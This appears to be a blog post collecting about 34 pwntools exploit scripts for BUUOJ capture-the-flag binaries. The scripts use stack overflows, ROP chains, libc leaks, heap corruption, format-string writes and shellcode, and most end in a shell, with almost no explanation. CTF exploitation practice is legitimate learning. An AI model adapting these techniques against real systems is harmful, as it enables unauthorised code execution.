NO.00 pwn1_sctf_2016_sovle
exp
#-*- coding:utf-8-*-
from pwn import *
p = remote('node3.buuoj.cn',28928)
#print p.recvuntil('Tell me something about yourself: ')
payload = 'I'*0x14 + 'a'*4 + p64(0x08048F0D)
p.sendline(payload)
p.interactive()
NO.01 warmup_csaw_2016_sovle
exp
#-*- coding:utf-8-*
from pwn import *
io=remote("node2.buuoj.cn.wetolink.com",28872)
#io=process("./warmup_csaw_2016")
pop_rdi = 0x400713
pop_rsi_r15 = 0x400711
bss = 0x601058
gets_addr = 0x400500
sys_addr = 0x4004d0
print io.recv()
payload = 'a'*0x40+'a'*8 +p64(pop_rdi) + p64(bss) + p64(gets_addr) + p64(pop_rdi)+p64(bss)+p64(sys_addr)
io.sendline(payload)
io.interactive()
NO.02 babyheap_0ctf_2017_sovle
exp
from pwn import *
from LibcSearcher import *
context.log_level = 'debug'
p =process('./babyheap_0ctf_2017')
libc=ELF('/lib/x86_64-linux-gnu/libc.so.6')
#p =remote('node3.buuoj.cn',26914)
def Allocate(size):
p.recvuntil("Command:")
p.sendline("1")
p.recvuntil("Size:")
p.sendline(str(size))
def Fill(idx,con):
p.recvuntil("Command: ")
p.sendline("2")
p.recvuntil("Index:")
p.sendline(str(idx))
p.recvuntil("Size:")
p.sendline(str(len(con)))
p.recvuntil("Content:")
p.sendline(con)
def Free(idx):
p.recvuntil("Command:")
p.sendline("3")
p.recvuntil("Index:")
p.sendline(str(idx))
def Dump(idx):
p.recvuntil("Command:")
p.sendline("4")
p.recvuntil("Index:")
p.sendline(str(idx))
p.recvuntil('Content: \n')
return p.recvline()
Allocate(0x60)#idx=0
Allocate(0x30)#idx=1
#sleep(1)
Fill(0,"a"*0x60+p64(0)+p64(0x71))
Allocate(0x100)#idx=2
Fill(2,"a"*0x20+p64(0)+p64(0x71))
Free(1)
Allocate(0x60)#idx=2
Fill(1,"a"*0x30+p64(0)+p64(0x111))
Allocate(0x60)
Free(2)
#gdb.attach(p)
print Dump(1)
#print hexDump(1)[:-8]
leak = u64(Dump(1)[-25:-17])-0x58
print "leak:"+hex(leak)
base=leak-0x3c4b20
malloc_hook=base+libc.sym['__malloc_hook']
print hex(malloc_hook)
Free(1)
gdb.attach(p)
Fill(0,"a"*0x60+p64(0)+p64(0x71)+p64(malloc_hook-0x23)+p64(0))
Allocate(0x60)#idx
Allocate(0x60)#idx
Fill(2,"a"*3+p64(0)+p64(0)+p64(base+0x4526a))
#gdb.attach(p)
#gdb.attach(p)
Allocate(0x100)#idx4
p.interactive()
NO.03 babyfengshui_sovle
exp
#-*- coding:utf-8-*-
from pwn import *
from LibcSearcher import *
#p=remote('111.198.29.45',35423)
p = remote('node3.buuoj.cn',26557)
elf=ELF('./babyfengshui')
#libc = ELF('libc.so.6')
obj=LibcSearcher('free',0xf7659750)
def add_note(size,length,text):
p.recvuntil('Action: ')
p.sendline('0')
p.recvuntil('size of description: ')
p.sendline(str(size))
p.recvuntil('name: ')
p.sendline('AAA')
p.recvuntil('text length: ')
p.sendline(str(length))
p.recvuntil('text: ')
p.sendline(text)
def delete_note(idx):
p.recvuntil('Action: ')
p.sendline('1')
p.recvuntil('index: ')
p.sendline(str(idx))
def display_note(idx):
p.recvuntil('Action: ')
p.sendline('2')
p.recvuntil('index: ')
p.sendline(str(idx))
def update_note(idx,length,text):
p.recvuntil('Action: ')
p.sendline('3')
p.recvuntil('index: ')
p.sendline(str(idx))
p.recvuntil('text length: ')
p.sendline(str(length))
p.sendlineafter('text: ',text)
add_note(0x80,0x80,'abcd')
add_note(0x80,0x80,'efgh')
add_note(0x8,0x8,'/bin/sh\00')
delete_note(0)
add_note(0x100,0x19c,'a'*0x198 + p32(elf.got['free']))
display_note(1)
p.recvuntil('description: ')
free_addr=u32(p.recv(4))
print hex(free_addr)
system_addr = free_addr - (obj.dump('free') - obj.dump('system'))
log.info("system_addr 0x%x" % system_addr)
update_note(1,0x4,p32(system_addr))
delete_note(2)
p.interactive()
NO.04 第五空间2019 决赛]PWN5-sovle
exp
#-*- coding:utf-8-*-
from pwn import *
context(os="linux", arch="i386", log_level="debug")
#p = process('./第五空间2019 决赛]PWN5')
p = remote('node3.buuoj.cn',27557)
elf = ELF('第五空间2019 决赛]PWN5')
offset = 10
'''
#这个方法是将atoi改为system,输入密码时直接传入/bin/sh,if语句中直接得到shell.
system_addr = 0x08049080
aoti_addr = elf.got['atoi']
p.recvuntil('your name:')
payload = fmtstr_payload(offset,{aoti_addr:system_addr})
p.sendline(payload)
p.recvuntil('your passwd:')
p.sendline('/bin/sh\x00')
p.interactive()
'''
addr=0x0804C044 #unk_804C044_addr
payload=p32(addr)+p32(addr+1)+p32(addr+2)+p32(addr+3)
payload+='%10$hhn%11$hhn%12$hhn%13$hhn'
# %10$hhn表示向偏移为10处写入的地址空间为1字节
# %$hn表示写入的地址空间为2字节
# %$lln表示写入的地址空间为8字节
p.recvuntil('your name:')
p.sendline(payload)
p.recvuntil('your passwd:')
p.sendline(str(0x10101010))
#这里的四个0x10是表示payloa中四个地址的数据长度,32位一个地址占4字节
p.interactive()
NO.05 get_started_3dsctf_2016_sovle
exp
#-*- coding:utf-8-*-
from pwn import *
context.arch = "i386"
context.log_level = "debug"
#sh = process("./get_started_3dsctf_2016")
sh = remote('node3.buuoj.cn',27290)
elf = ELF("get_started_3dsctf_2016")
pop2_ret = 0x0809a7dc
pop3_ret = 0x0804f460
payload = 'a' * 56 + p32(elf.symbols['mprotect']) + p32(pop3_ret) + p32(0x080EB000) + p32(0x3000) + p32(7) + p32(elf.symbols['read']) + p32(pop3_ret) + p32(0) + p32(0x080EBF80) + p32(0x200) + p32(0x080EBF80)
sh.sendline(payload)
#sleep(1)
#input()
sh.sendline(asm(shellcraft.sh()))
sh.interactive()
NO.06 not_the_same_3dsctf_2016_sovle
exp
#-*- coding:utf-8-*-
from pwn import *
context(os="linux", arch="i386", log_level="debug")
#p = process('./not_the_same_3dsctf_2016')
p = remote('node3.buuoj.cn',26723)
elf = ELF('not_the_same_3dsctf_2016')
offset = 0x2d
ppp = 0x0809e3e5
bss = 0x080EC624
pit_got = 0x080EB000
payload = 'a'*offset + p32(elf.symbols['mprotect'])
payload += p32(ppp) + p32(pit_got) + p32(0x1001)+ p32(7) + p32(elf.symbols['read'])
payload += p32(ppp) + p32(0) + p32(bss) + p32(0x1000) + p32(bss)
p.sendline(payload)
sleep(0.2)
p.sendline(asm(shellcraft.sh()))
p.interactive()
'''
#本地可行
offset = 0x2d
get_secret = 0x080489A0
fl4g = 0x080ECA2D
printf = 0x0804F0A0
payload = 'a'*offset + p32(get_secret)
payload += p32(printf)+p32(1) + p32(fl4g)
p.sendline(payload)
p.interactive()
'''
NO.07 ciscn_2019_n_8_sovle
exp
#-*- coding:utf-8-*-
from pwn import *
context(os="linux", arch="amd64", log_level="debug")
#p = process('./ciscn_2019_n_8')
p = remote('node3.buuoj.cn',26718)
p.recv()
payload = '\x11'*53
p.sendline(payload)
p.interactive()
NO.08 pwn2 sovle
exp
#-*- coding:utf-8-*-
from pwn import *
context(os="linux", arch="amd64", log_level="debug")
#p = remote()
p = process('./pwn2')
elf = ELF('pwn2')
bss = 0x0601060
rdi = 0x0000000000400693
x = 0x00400001
ret = 0x00000000004004ae
payload = p64(rdi) + p64(x)+ p64(x) + asm(shellcraft.sh())
#payload = asm(shellcraft.sh())
p.recvuntil('bss:\n')
p.sendline(payload.ljust(112,'a'))
payload1 = 'a'*(0xa+8) + p64(x)
p.recvuntil('stack:\n')
p.sendline(payload1)
p.interactive()
NO.09 [OGeek2019]babyrop _sovle
exp
#-*- coding:utf-8-*-
from pwn import *
context(os="linux", arch="amd64", log_level="debug")
local = 0
if local:
p = process('./[OGeek2019]babyrop')
elf = ELF('[OGeek2019]babyrop')
libc = ELF('libc-2.23.so')
else:
p = remote('node3.buuoj.cn',28661)
elf = ELF('[OGeek2019]babyrop')
libc = ELF('libc-2.23.so')
write_plt = elf.plt['write']
write_got = elf.got['write']
main_addr = 0x08048825
payload1 = '\x00'+ '\xff'*7
p.sendline(payload1)
p.recvuntil('Correct\n')
payload2 = 'a'* (0xe7+4) + p32(write_plt) + p32(main_addr) + p32(1) + p32(write_got) + p32(4)
p.sendline(payload2)
write_addr = u32(p.recv(4))
offset = write_addr - libc.sym['write']
system_addr = libc.sym['system'] + offset
binsh = libc.search('/bin/sh').next() + offset
p.sendline(payload1)
p.recvuntil('Correct\n')
payload3 = 'a'*(0xe7+4) + p32(system_addr) + 'aaaa' + p32(binsh)
p.sendline(payload3)
p.interactive()
NO.10 铁人三项(第五赛区)_2018_rop_sovle
exp
#-*- coding:utf-8-*-
from pwn import *
context(os="linux", arch="i386", log_level="debug")
p = remote('node3.buuoj.cn',29800)
#p = process('./铁人三项(第五赛区)_2018_rop')
elf = ELF('铁人三项(第五赛区)_2018_rop')
write_plt=elf.plt['write']
read_plt=elf.plt['read']
main_addr=elf.symbols['main']
bss_addr=elf.symbols['__bss_start']
def leak(address):
payload1='a'*(0x88+0x4)+p32(write_plt)+p32(main_addr)+p32(0x1)+p32(address)+p32(0x4)
p.sendline(payload1)
leak_address=p.recv(4)
return leak_address
d=DynELF(leak,elf=ELF('铁人三项(第五赛区)_2018_rop'))
sys_addr=d.lookup('system','libc')
payload2='a'*(0x88+0x4)+p32(read_plt)+p32(main_addr)+p32(0x0)+p32(bss_addr)+p32(0x8)
p.sendline(payload2)
p.sendline('/bin/sh')
payload3='a'*(0x88+0x4)+p32(sys_addr)+p32(main_addr)+p32(bss_addr)
p.sendline(payload3)
p.interactive()
NO.11 bjdctf_2020_babyrop_sovle
exp
#-*- coding:utf-8-*-
from pwn import *
from LibcSearcher import*
context(os="linux", arch="amd64", log_level="debug")
local = 0
if local:
p = process('./bjdctf_2020_babyrop')
elf = ELF('bjdctf_2020_babyrop')
#libc = ELF('')
else:
p = remote('node3.buuoj.cn',26680)
elf = ELF('bjdctf_2020_babyrop')
#libc = ELF('')
junk = 32
popr = 0x0000000000400733
puts_got = elf.got["puts"]
puts_plt = elf.symbols["puts"]
read_plt = elf.got["read"]
read_got = elf.symbols["read"]
main_addr = 0x04006AD
start_addr = 0x400530
payload = junk*'A'+'BBBBBBBB'+p64(popr)+p64(puts_got)+p64(puts_plt)+p64(start_addr)
p.recvuntil("Pull up your sword and tell me u story!\n")
p.sendline(payload)
puts_addr = u64(p.recvuntil("\x7f")[-6:].ljust(8,'\x00'))
log.info("puts_addr:"+hex(puts_addr))
libc = LibcSearcher("puts",puts_addr)
offset = puts_addr - libc.dump("puts")
sys_addr = offset+libc.dump("system")
binsh_addr = offset+libc.dump("str_bin_sh")
payload = junk*'A'+'BBBBBBBB'+p64(popr)+p64(binsh_addr)+p64(sys_addr)+p64(start_addr)
p.recvuntil("Pull up your sword and tell me u story!\n")
p.sendline(payload)
p.interactive()
NO.12 ciscn_2019_c_1_sovle
exp
#-*- coding:utf-8-*-
from pwn import *
context(os="linux", arch="amd64", log_level="debug")
p = remote('node3.buuoj.cn',28138)
#p = process('./ciscn_2019_c_1')
elf = ELF('ciscn_2019_c_1')
libc = ELF('libc-2.27.so')
def send(pad):
print p.recvuntil('Input your choice!')
p.sendline('1')
print p.recvuntil('Input your Plaintext to be encrypted')
p.sendline(pad)
padding = 0x50+8
pop_rdi_addr = 0x400c83
main_addr = 0x0400B28
__libc_start_main_got_addr = elf.got['__libc_start_main']
puts_plt_addr = elf.plt['puts']
payload = 'a'*(0x50 + 8)
payload += p64(pop_rdi_addr)
payload += p64(__libc_start_main_got_addr)
payload += p64(puts_plt_addr)
payload += p64(main_addr)
send(payload)
'''
print p.recvline()
print p.recvline()
print p.recvline()
'''
p.recvuntil('@\n')
offest = u64(p.recvline().strip().ljust(8,'\x00')) - libc.sym['__libc_start_main']
system_addr = libc.sym['system'] + offest
bin_addr = libc.search('/bin/sh').next() + offest
ret = 0x00000000004006b9
payload1 = 'a'*padding+ p64(ret) + p64(pop_rdi_addr) + p64(bin_addr) + p64(system_addr)
send(payload1)
p.interactive()
NO.13 [BJDCTF 2nd]r2t3 _sovle
exp
#-*- coding:utf-8-*-
from pwn import *
context(os="linux", arch="amd64", log_level="debug")
local = 1
if local:
p = process('./[BJDCTF 2nd]r2t3')
else:
p = remote('node3.buuoj.cn',29466)
system_addr=0x0804858B
payload = 'a'*8 + 'a'*(0x9+0x4) + p32(system_addr) + 'a'*(0x103-0x15-0x4)
# 绕过范围 (3,8],0x103 ~ 0x107 使用p.sendline()發送時多了一個換行符號 所以 0x103也可。
p.recvuntil('[+]Please input your name:\n')
p.sendline(payload)
print(hex(len(payload)))
p.interactive()
NO.14 [BJDCTF 2nd]one_gadget _sovle
exp
#-*- coding:utf-8-*-
from pwn import *
from LibcSearcher import *
context(os="linux", arch="amd64", log_level="debug")
local = 0
if local:
p = process('./[BJDCTF 2nd]one_gadget')
else:
p = remote('node3.buuoj.cn',28292)
elf = ELF('[BJDCTF 2nd]one_gadget')
libc = ELF('libc-2.29.so')
one_gadget = [0xe237f,0xe2383,0xe2386,0x106ef8]
p.recvuntil(":0x")
printf_addr = int(p.recvuntil('\n'),16)
p.recvuntil(':')
offest = printf_addr - libc.sym['printf']
payload = one_gadget[3] + offest
p.sendline(str(payload))
p.interactive()
NO.15 jarvisoj_level0_sovle
exp
#-*- coding:utf-8-*-
from pwn import *
context(os="linux", arch="amd64", log_level="debug")
p = process('./jarvisoj_level0')
#p = remote('node3.buuoj.cn',27617)
system_addr = 0x400460
binsh_addr = 0x040059A
sysfuntions_addr= 0x00400596
p.recvuntil('\n')
#payload = 'a'*(0x80+8) + p64(sysfuntions_addr) # sovle1
payload = 'a'*0x80 +p64(system_addr) +p64(binsh_addr) # sovle2
p.sendline(payload)
p.interactive()
NO.16 [HarekazeCTF2019]baby_rop _sovle
exp
#-*- coding:utf-8-*-
from pwn import *
context(os="linux", arch="amd64", log_level="debug")
local = 1
if local:
p = process('./[HarekazeCTF2019]baby_rop')
else:
p = remote('node3.buuoj.cn',27724)
elf = ELF('[HarekazeCTF2019]baby_rop')
#libc = ELF('')
system_addr = 0x00400490
system_addr1 = 0x04005E3
sh_addr = 0x0601048
pop_rdi = 0x0000000000400683
payload = 'a'*(0x10+8) + p64(pop_rdi) + p64(sh_addr) + p64(system_addr)
#payload = 'a'*(0x10+8) + p64(pop_rdi) + p64(sh_addr)+ p64(system_addr1)
p.recvuntil("What's your name? ")
p.sendline(payload)
p.interactive()
NO.17 jarvisoj_level2 _sovle
exp
#-*- coding:utf-8-*-
from pwn import *
context(os="linux", arch="amd64", log_level="debug")
local = 1
if local:
p = process('./jarvisoj_level2')
else:
p = remote('node3.buuoj.cn',29779)
#elf = ELF('')
#libc = ELF('')
system_addr = 0x804845C
system_addr1 = 0x08048320
binsh_addr = 0x0804A024
payload = 'a'*(0x88+4)+p32(system_addr)+p32(binsh_addr)
#payload = 'a'*(0x88+4)+p32(system_addr1)+'bbbb'+p32(binsh_addr)
p.recvuntil('\n')
p.sendline(payload)
p.interactive()
NO.18 bjdctf_2020_babystack_sovle
exp
#-*- coding:utf-8-*-
from pwn import *
context(os="linux", arch="amd64", log_level="debug")
local = 0
if local:
p = process('./bjdctf_2020_babystack')
else:
p = remote('node3.buuoj.cn',26095)
#elf = ELF('bjdctf_2020_babystack')
#libc = ELF('/libc/ubuntu16/64/libc-2.23.so')
binsh_addr = 0x0004006E6
payload = 'a'*(0x10) +p64(0x123123)+ p64(binsh_addr)
p.sendafter('Please input the length of your name:\n',str(123123)+'\n')
p.sendafter("What's u name?\n",payload+'\n')
p.interactive()
NO.19 ciscn_2019_n_5 _sovle
exp
#-*- coding:utf-8-*-
from pwn import *
context(os="linux", arch="amd64", log_level="debug")
local = 0
if local:
p = process('./ciscn_2019_n_5')
else:
p = remote('node3.buuoj.cn',27053)
#elf = ELF('')
#libc = ELF('')
name_addr = 0x00601080
shellcode = asm(shellcraft.sh())
p.sendafter('tell me your name',shellcode+'\n')
payload = 'a'*(0x20+8) + p64(name_addr)
p.sendafter('What do you want to say to me?',payload+'\n')
p.interactive()
NO.20 ciscn_2019_s_3_sovle
exp
#-*- coding:utf-8-*-
from pwn import *
from LibcSearcher import *
context(os="linux", arch="amd64", log_level="debug")
local = 1
if local:
p = process('./ciscn_2019_s_3')
else:
p = remote('node3.buuoj.cn',25585)
elf = ELF('ciscn_2019_s_3')
#libc = ELF('')
main = elf.sym['main']
#main=0x0004004ED
execv = 0x04004E2
pop_rdi = 0x4005a3
pop_rbx_rbp_r12_r13_r14_r15 = 0x40059A
mov_rdxr13_call = 0x0400580
syscall = 0x00400517
payload = '/bin/sh\00'*2 + p64(main)
#gdb.attach(p)
p.sendline(payload)
p.recv(0x20)
binsh_addr = u64(p.recv(8)) - 0x138
print(hex(binsh_addr))
gdb.attach(p)
payload = '/bin/sh\00'*2 + p64(pop_rbx_rbp_r12_r13_r14_r15)
payload += p64(0)+p64(0)+p64(binsh_addr+0x50)
payload += p64(0)+p64(0)+p64(0)
payload += p64(mov_rdxr13_call)+p64(execv)
payload += p64(pop_rdi)+p64(binsh_addr)+p64(syscall)
p.sendline(payload)
p.interactive()
NO.21 jarvisoj_level2_x64 _sovle
exp
#-*- coding:utf-8-*-
from pwn import *
from LibcSearcher import *
context(os="linux", arch="amd64", log_level="debug")
local = 0
if local:
p = process('./jarvisoj_level2_x64')
else:
p = remote('node3.buuoj.cn',27721)
#elf = ELF('')
#libc = ELF('')
pop_rdi = 0x00000000004006b3
system_addr = 0x040063E
system_addr1 = 0x004004C0
binsh_addr = 0x0600A90
payload = 'a'*(0x80+8)+p64(pop_rdi)+p64(binsh_addr)+p64(system_addr1)
p.recvuntil('\n')
p.sendline(payload)
p.interactive()
NO.22 [HarekazeCTF2019]baby_rop2 _sovle
exp
#-*- coding:utf-8-*-
from pwn import *
from LibcSearcher import *
context(os="linux", arch="amd64", log_level="debug")
local = 1
if local:
p = process('./[HarekazeCTF2019]baby_rop2')
else:
p = remote('node3.buuoj.cn',29812)
elf = ELF('[HarekazeCTF2019]baby_rop2')
libc = ELF('/lib/x86_64-linux-gnu/libc.so.6')
main = elf.sym['main']
read_got = elf.got['read']
read_plt = elf.plt['read']
printf_plt = elf.plt['printf']
printf_got = elf.got['printf']
format_str=0x400770 #%s
pop_rdi = 0x0000000000400733
pop_rsi_r15 = 0x0000000000400731
payload = 'a'*(0x28) +p64(pop_rdi)+p64(read_got)+p64(printf_plt)+p64(main)
p.recvuntil('? ')
p.sendline(payload)
p.recvuntil('\n')
read_addr = u64(p.recvuntil("\x7f").ljust(8,'\x00'))
print hex(read_addr)
'''
libc = LibcSearcher('read',read_addr)
offset = read_addr - libc.dump('read')
system = offset + libc.dump('system')
binsh = offset + libc.dump('str_bin_sh')
'''
offset = read_addr - libc.sym['read']
system = libc.sym['system'] + offset
binsh = libc.search('/bin/sh').next()+offset
payload = 'a'*(0x28)+p64(pop_rdi)+p64(binsh)+p64(system)
p.recvuntil('? ')
p.sendline(payload)
p.interactive()
NO.23 ciscn_2019_ne_5 _sovle
exp
#-*- coding:utf-8-*-
from pwn import *
from LibcSearcher import *
context(os="linux", arch="amd64", log_level="debug")
local = 0
if local:
p = process('./ciscn_2019_ne_5')
else:
p = remote('node3.buuoj.cn',25921)
elf = ELF('ciscn_2019_ne_5')
#libc = ELF('')
system = elf.plt['system']
sh_addr = 0x080482EA
payload = 'a'*(0x48+4)+p32(system)+p32(0xdeadbeef)+p32(sh_addr)
p.recvuntil('Please input admin password:')
p.sendline('administrator')
p.recvuntil('0.Exit\n')
p.sendline('1')
p.recvuntil(':')
p.sendline(payload)
p.recvuntil('0.Exit\n')
p.sendline('4')
p.interactive()
NO.24 pwn2_sctf_2016 _sovle
exp
#-*- coding:utf-8-*-
from pwn import *
from LibcSearcher import *
context(os="linux", arch="amd64", log_level="debug")
local = 0
if local:
p = process('./pwn2_sctf_2016')
else:
p = remote('node3.buuoj.cn',26427)
elf = ELF('pwn2_sctf_2016')
libc = ELF('libc/ubuntu16/32/libc-2.23.so')
atoi_got = elf.got['atoi']
printf_plt = elf.plt['printf']
printf_got = elf.got['printf']
main_addr = elf.symbols['main']
format_addr = 0x080486F8
def send(payload):
p.recvuntil('How many bytes do you want me to read? ')
p.sendline(str(-1))
p.recvuntil('data!\n')
p.sendline(payload)
payload = 'a'*(0x2c+4)+p32(printf_plt)+p32(main_addr)+p32(format_addr)+p32(atoi_got)
send(payload)
p.recvuntil('You said: ')
p.recvuntil('You said: ')
atoi_addr = u32(p.recv(4))
offset = atoi_addr - libc.sym['atoi']
system = libc.sym['system']+offset
binsh = libc.search('/bin/sh').next()+offset
payload = 'a'*(0x2c+4)+p32(system)+p32(0xdeefdedf)+p32(binsh)
send(payload)
p.interactive()
NO.25 ez_pz_hackover_2016 _sovle
exp
#-*- coding:utf-8-*-
from pwn import *
from LibcSearcher import *
context(os="linux", arch="i386", log_level="debug")
local = 0
if local:
p = process('./ez_pz_hackover_2016')
else:
p = remote('node3.buuoj.cn',29304)
#elf = ELF('ez_pz_hackover_2016')
#libc = ELF('/lib/x86_64-linux-gnu/libc.so.6')
p.recvuntil('Yippie, lets crash: ')
s_addr = int(p.recv(10), 16)
p.recvuntil('> ')
#print(hex(s_addr))
payload = 'crashme\x00'+'\x00'*(26-8)+p32(s_addr-0x1c) + asm(shellcraft.sh())
#gdb.attach(p)
p.sendline(payload)
p.interactive()
NO.26 ciscn_2019_es_2_sovle
exp
#-*- coding:utf-8-*-
from pwn import *
from LibcSearcher import *
context(os="linux", arch="i386", log_level="debug")
local = 1
if local:
p = process('./ciscn_2019_es_2')
else:
p = remote('node3.buuoj.cn',26426)
elf = ELF('ciscn_2019_es_2')
#libc = ELF('/lib/x86_64-linux-gnu/libc.so.6')
system_plt = elf.plt['system']
vuln = 0x08048595
hack = 0x0804854B
leave = 0x080484B8
payload = '/bin/sh'
payload = payload.ljust(0x27,'a')
p.recvuntil('\n')
gdb.attach(p)
p.sendline(payload)
p.recv(0x2f)
ebp_addr = u32(p.recv(4)) - 0x38
print "ebd_addr =>" , hex(ebp_addr)
payload = 'bbbb'+ p32(system_plt) +'cccc'+p32(ebp_addr+0x10)+'/bin/sh\x00'
payload = payload.ljust(0x28,'d')
payload += p32(ebp_addr)+p32(leave)
p.sendline(payload)
p.interactive()
NO.27 jarvisoj_level3_sovle
exp
#-*- coding:utf-8-*-
from pwn import *
from LibcSearcher import *
context(os="linux", arch="amd64", log_level="debug")
local = 0
if local:
p = process('./jarvisoj_level3')
else:
p = remote('node3.buuoj.cn',28355)
elf = ELF('jarvisoj_level3')
#libc = ELF('/lib/x86_64-linux-gnu/libc.so.6')
write_plt = elf.plt['write']
write_got = elf.got['write']
main = elf.sym['main']
payload = 'a'*(0x88+4)+p32(write_plt)+p32(main)+p32(1)+p32(write_got)+p32(4)
#gdb.attach(p)
#print hex(len(payload))
p.recvuntil('Input:\n')
p.sendline(payload)
write_addr = u32(p.recv(4))
#print hex(write_addr)
libc = LibcSearcher('write',write_addr)
offset = write_addr - libc.dump('write')
system = libc.dump('system') + offset
binsh = libc.dump('str_bin_sh') + offset
payload = 'a'*(0x88+4)+p32(system)+p32(main)+p32(binsh)
p.recvuntil('\n')
p.sendline(payload)
p.interactive()
NO.28 [BJDCTF 2nd]ydsneedgirlfriend2_sovle
exp
#-*- coding:utf-8-*-
from pwn import *
from LibcSearcher import *
context(os="linux", arch="amd64", log_level="debug")
local = 0
if local:
p = process('./[BJDCTF 2nd]ydsneedgirlfriend2')
else:
p = remote('node3.buuoj.cn',26424)
elf = ELF('[BJDCTF 2nd]ydsneedgirlfriend2')
#libc = ELF('/lib/x86_64-linux-gnu/libc.so.6')
def add(size,context):
p.recvuntil("u choice :\n")
p.sendline(str(1))
p.recvuntil("Please input the length of her name:\n")
p.sendline(str(size))
p.recvuntil("Please tell me her name:\n")
p.sendline(context)
def delete(index):
p.recvuntil("u choice :\n")
p.sendline(str(2))
p.recvuntil("Index :")
p.sendline(str(index))
def show(index):
p.recvuntil("u choice :\n")
p.sendline(str(3))
p.recvuntil("Index :")
p.sendline(str(index))
backdoor = 0x400D86
add(0x20,"a"*0x10)
delete(0)
add(0x10,p64(0)+p64(backdoor))
show(0)
p.interactive()
NO.29 jarvisoj_fm _sovle
exp
#-*- coding:utf-8-*-
from pwn import *
from LibcSearcher import *
context(os="linux", arch="amd64", log_level="debug")
local = 0
if local:
p = process('./jarvisoj_fm')
else:
p = remote('node3.buuoj.cn',27403)
#elf = ELF('')
#libc = ELF('/lib/x86_64-linux-gnu/libc.so.6')
x = 0x0804A02C
payload = p32(x)+"%11$n" #fmtstr_payload(offset,{x:pad})
p.sendline(payload)
p.interactive()
NO.30 [BJDCTF 2nd]r2t4 _sovle
exp
#-*- coding:utf-8-*-
from pwn import *
from LibcSearcher import *
context(os="linux", arch="amd64", log_level="debug")
local = 0
if local:
p = process('./[BJDCTF 2nd]r2t4')
else:
p = remote('node3.buuoj.cn',26399)
elf = ELF('[BJDCTF 2nd]r2t4')
#libc = ELF('/lib/x86_64-linux-gnu/libc.so.6')
backdoor = 0x00400626
bss = 0x0601050
leave = 0x004006BA
__stack_chk_fail = elf.got['__stack_chk_fail']
payload = 'aaa%61c%9$hn%1510c%10$hn'+p64(__stack_chk_fail+2)+p64(__stack_chk_fail)
p.sendline(payload)
p.interactive()
NO.31 jarvisoj_tell_me_something_sovle
exp
#-*- coding:utf-8-*-
from pwn import *
from LibcSearcher import *
context(os="linux", arch="amd64", log_level="debug")
local = 0
if local:
p = process('./jarvisoj_tell_me_something')
else:
p = remote('node3.buuoj.cn',26222)
elf = ELF('jarvisoj_tell_me_something')
#libc = ELF('/lib/x86_64-linux-gnu/libc.so.6')
good_game = 0x000400620
payload = 'a'*(0x88)+p64(0x0400620)
p.recvuntil('\n')
p.sendline(payload)
p.interactive()
NO.32 jarvisoj_level4_sovle
exp
#-*- coding:utf-8-*-
from pwn import *
from LibcSearcher import *
context(os="linux", arch="amd64", log_level="debug")
local = 0
if local:
p = process('./jarvisoj_level4')
else:
p = remote('node3.buuoj.cn',26528)
elf = ELF('jarvisoj_level4')
#libc = ELF('/lib/x86_64-linux-gnu/libc.so.6')
write_plt = elf.plt['write']
write_got = elf.got['write']
main = elf.sym['main']
payload = 'a'*(0x88+4) + p32(write_plt)+p32(main)+p32(1)+p32(write_got)+p32(4)
p.sendline(payload)
write_addr = u32(p.recv(4))
print hex(write_addr)
libc = LibcSearcher('write',write_addr)
offset = write_addr - libc.dump('write')
system = libc.dump('system') + offset
binsh = libc.dump('str_bin_sh') + offset
payload = 'a'*(0x88+4) + p32(system)+p32(main)+p32(binsh)
p.sendline(payload)
p.interactive()
NO.33 jarvisoj_level3_x64_sovle
exp
#-*- coding:utf-8-*-
from pwn import *
from LibcSearcher import *
context(os="linux", arch="amd64", log_level="debug")
local = 1
if local:
p = process('./jarvisoj_level3_x64')
else:
p = remote('node3.buuoj.cn',29849)
elf = ELF('jarvisoj_level3_x64')
#libc = ELF('/lib/x86_64-linux-gnu/libc.so.6')
pop_rdi = 0x00000000004006b3
pop_rsi_r15 = 0x00000000004006b1
write_plt = elf.plt['write']
write_got = elf.got['write']
main = elf.sym['main']
#print hex(write_plt),hex(write_got)
payload = 'a'*(0x80+8)+p64(pop_rdi) + p64(1)
payload += p64(pop_rsi_r15)+p64(write_got)+p64(0)+p64(write_plt)+p64(main)
gdb.attach(p)
p.recvuntil('\n')
p.sendline(payload)
write_addr = u64(p.recv(8))
print hex(write_addr)
libc = LibcSearcher('write',write_addr)
offset = write_addr - libc.dump('write')
system = libc.dump('system') + offset
binsh = libc.dump('str_bin_sh') + offset
payload = 'a'*(0x80+8) +p64(pop_rdi)+p64(binsh)+p64(system)+p64(main)
p.sendline(payload)
p.interactive()
p.interactive()
NO.34 1exp2txt(for blog)_sovle
exp
#-*- coding:utf-8-*-
import os
s=0
f1 = open('1exp.txt','w')
dir_list = []
for root,dire,files in os.walk('./'):
for i in files:
if os.path.splitext(i)[1] == '.py':
dir_list.append(i)
dir_list = sorted(dir_list,key=lambda x: os.path.getmtime(os.path.join('./', x)))
for i in dir_list:
with open(i,'r') as f:
f1.write('\n#NO.'+str(s).rjust(2,'0')+' '+i.split('.')[0]+'\n\n###exp\n```\n')
f1.write(f.read())
f1.write('```\n\n\n')
s+=1
网友评论